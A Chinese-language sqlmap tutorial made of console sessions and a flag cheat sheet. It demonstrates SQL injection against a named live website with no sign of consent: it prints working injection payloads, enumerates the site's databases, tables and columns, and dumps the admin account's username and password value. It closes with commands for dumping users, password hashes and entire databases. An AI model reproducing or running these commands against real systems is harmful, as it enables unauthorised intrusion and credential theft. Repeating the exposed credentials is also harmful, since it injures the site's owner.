注:标黃處為輸入内容 批注為得到的資訊
1.-u url --dbs 爆資料庫
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:23:20
[15:23:21] [INFO] resuming back-end DBMS 'mysql'
[15:23:21] [INFO] testing connection to the target url
[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7
46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,
NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[15:23:22] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[15:23:22] [INFO] fetching database names
[15:23:22] [INFO] the SQL query used returns 5 entries
[15:23:22] [INFO] resumed: "information_schema"
[15:23:22] [INFO] resumed: "gold"
[15:23:22] [INFO] resumed: "mysql"
[15:23:22] [INFO] resumed: "performance_schema"
[15:23:22] [INFO] resumed: "test"
available databases [5]:
[*] gold
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu
t\www.lbgold.com'
[*] shutting down at 15:23:23
2. -u url --tables -D 資料庫//爆表段
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:52:54
[15:52:54] [INFO] resuming back-end DBMS 'mysql'
[15:52:55] [INFO] testing connection to the target url
[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7
46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,
NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[15:52:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[15:52:56] [INFO] fetching tables for database: 'gold'
[15:52:58] [INFO] the SQL query used returns 5 entries
[15:52:59] [INFO] retrieved: "admin"
[15:53:00] [INFO] retrieved: "article"
[15:53:01] [INFO] retrieved: "class"
[15:53:02] [INFO] retrieved: "content"
[15:53:03] [INFO] retrieved: "djjl"
Database: gold
[5 tables]
+---------+
| admin |
| article |
| class |
| content |
| djjl |
+---------+
[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu
t\www.lbgold.com'
[*] shutting down at 15:53:04
3. -u url --columns -T 表段-D資料庫//爆字段
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:58:10
[15:58:10] [INFO] resuming back-end DBMS 'mysql'
[15:58:10] [INFO] testing connection to the target url
[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7
46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,
NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[15:58:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'
[15:58:13] [INFO] the SQL query used returns 3 entries
[15:58:14] [INFO] retrieved: "id","int(2)"
[15:58:15] [INFO] retrieved: "user","char(12)"
[15:58:16] [INFO] retrieved: "password","char(36)"
Database: gold
Table: admin
[3 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| id | int(2) |
| password | char(36) |
| user | char(12) |
+----------+----------+
[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu
t\www.lbgold.com'
[*] shutting down at 15:58:17
4.-u url --dump -C 字段-T表段-D資料庫//猜解
(1) 猜解password字段
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:02:05
[16:02:05] [INFO] resuming back-end DBMS 'mysql'
[16:02:05] [INFO] testing connection to the target url
[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7
46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,
NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[16:02:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in
database 'gold'
[16:02:08] [INFO] the SQL query used returns 1 entries
[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"
[16:02:09] [INFO] analyzing table dump for possible password hashes
Database: gold
Table: admin
[1 entry]
+---------------+
| password |
+---------------+
| ecoDz4IPZGYNs |
+---------------+
[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\
www.lbgold.com\dump\gold\admin.csv'
[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu
t\www.lbgold.com'
[*] shutting down at 16:02:09
(2) 猜解id字段
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:10:22
[16:10:22] [INFO] resuming back-end DBMS 'mysql'
[16:10:22] [INFO] testing connection to the target url
[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7
46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,
NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[16:10:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in databa
se 'gold'
[16:10:24] [INFO] the SQL query used returns 1 entries
[16:10:25] [INFO] retrieved: "1"
[16:10:25] [INFO] analyzing table dump for possible password hashes
Database: gold
Table: admin
[1 entry]
+----+
| id |
+----+
| 1 |
+----+
[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\
www.lbgold.com\dump\gold\admin.csv'
[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu
t\www.lbgold.com'
[*] shutting down at 16:10:25
(3) 猜解user字段
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:10:48
[16:10:48] [INFO] resuming back-end DBMS 'mysql'
[16:10:48] [INFO] testing connection to the target url
[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7
46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,
NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[16:10:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in data
base 'gold'
[16:10:49] [INFO] the SQL query used returns 1 entries
[16:10:50] [INFO] retrieved: "ssb"
[16:10:51] [INFO] analyzing table dump for possible password hashes
Database: gold
Table: admin
[1 entry]
+------+
| user |
+------+
| ssb |
+------+
[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\
www.lbgold.com\dump\gold\admin.csv'
[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu
t\www.lbgold.com'
[*] shutting down at 16:10:51
[[email protected]~]# Sqlmap
5.sqlmap工具的使用指令
mssql access 直接爆表.然後你懂的
BT5裡面的話前面就要加python
sqlmap.py -u url --dbs //爆資料庫
sqlmap.py -u url --current-db //爆目前庫
sqlmap.py -u url --current-user //爆目前使用者
sqlmap.py -u url --users 檢視使用者權限
sqlmap.py -u url --tables -D 資料庫//爆表段
sqlmap.py -u url --columns -T 表段-D資料庫//爆字段
sqlmap.py -u url --dump -C 字段-T表段-D資料庫//猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段-T表段-D資料庫//猜解1到3的字段
翻回來也可以
sqlmap.py -u url 判斷
sqlmap.py -u url --is-dba -v 這是判斷目前資料庫的使用者是否是dba
sqlmap.py -u url --users -v 0 這句的目的是列舉資料庫的使用者
sqlmap.py -u url --passwords -v 0 這句的目的是擷取資料庫使用者的密碼
sqlmap.py -u url --privileges -v 0 這是判斷目前的權限
sqlmap.py -u url --dbs -v 0 這句的目的是将所有的資料庫列出來
sqlmap.py -u url --tables -D '表'爆表
sqlmap.py -u url --columns -T ‘表’-D‘資料庫’爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0這裡是查詢第2到第4行的内
sqlmap.py -u url --dump -all -v 0
![sqlmap mysql案例_sqlmap介紹與使用案例[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)